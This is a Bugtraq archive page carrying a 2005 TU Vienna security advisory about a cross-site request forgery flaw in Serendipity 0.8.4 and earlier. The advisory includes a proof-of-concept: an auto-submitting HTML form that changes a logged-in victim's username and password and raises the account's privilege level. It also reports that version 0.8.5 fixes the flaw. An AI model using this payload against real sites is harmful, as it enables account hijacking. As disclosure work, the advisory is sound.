Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Serendipity: Account Hijacking / CSRF Vulnerability

From: enji () infosys tuwien ac at
Date: 29 Sep 2005 12:58:48 -0000
===========================================================
Serendipity: Account Hijacking / CSRF Vulnerability
===========================================================
Technical University of Vienna Security Advisory
TUVSA-0509-001, September 29, 2005
===========================================================


Affected applications
----------------------

Serendipity (www.s9y.org)

Versions 0.8.4 and prior.


Description
------------

An attacker is able to change the username and password of a logged-in user
(and can therefore hijack his account) by tricking the user into clicking a
link to a page with the following contents:

    <form 
action="http://your-server/path-to-s9y/serendipity_admin.php?serendipity[adminModule]=personal&amp;serendipity[adminAction]=save";
 method="post">
        <input type="text" name="username" value="evilguy" />
        <input type="text" name="password" value="evilpass" />
        <input type="text" name="realname" value="John Doe" />
        <input type="text" name="userlevel" value="255"/>
        <input type="text" name="email" value="john () example com" />
        <input type="text" name="lang" value="en"/>
        <input type="submit" name="SAVE" value="Save" />
    </form>

    <script type="text/javascript">
      document.forms[0].submit();
    </script>

The fields "your-server" and "path-to-s9y" in the form's action attribute have to
be adjusted accordingly. 

Similar attacks (termed as "Cross-Site Request Forgery" or CSRF) can be
launched for performing other requests disguised as the victim.
However, this problem is not limited to Serendipity, but affects a large
number of comparable web applications available at this time.


Solution
---------

Version 0.8.5 of Serendipity is reported by the developers to fix
the Account Hijacking vulnerability as well as the general CSRF problem itself.


Acknowledgements
-----------------

Thanks to Serendipity developer Garvin Hicking for his quick response and
professional cooperation.


Nenad Jovanovic
Secure Systems Lab 
Technical University of Vienna 
www.seclab.tuwien.ac.at
Previous By Date Next
Previous By Thread Next

Current thread: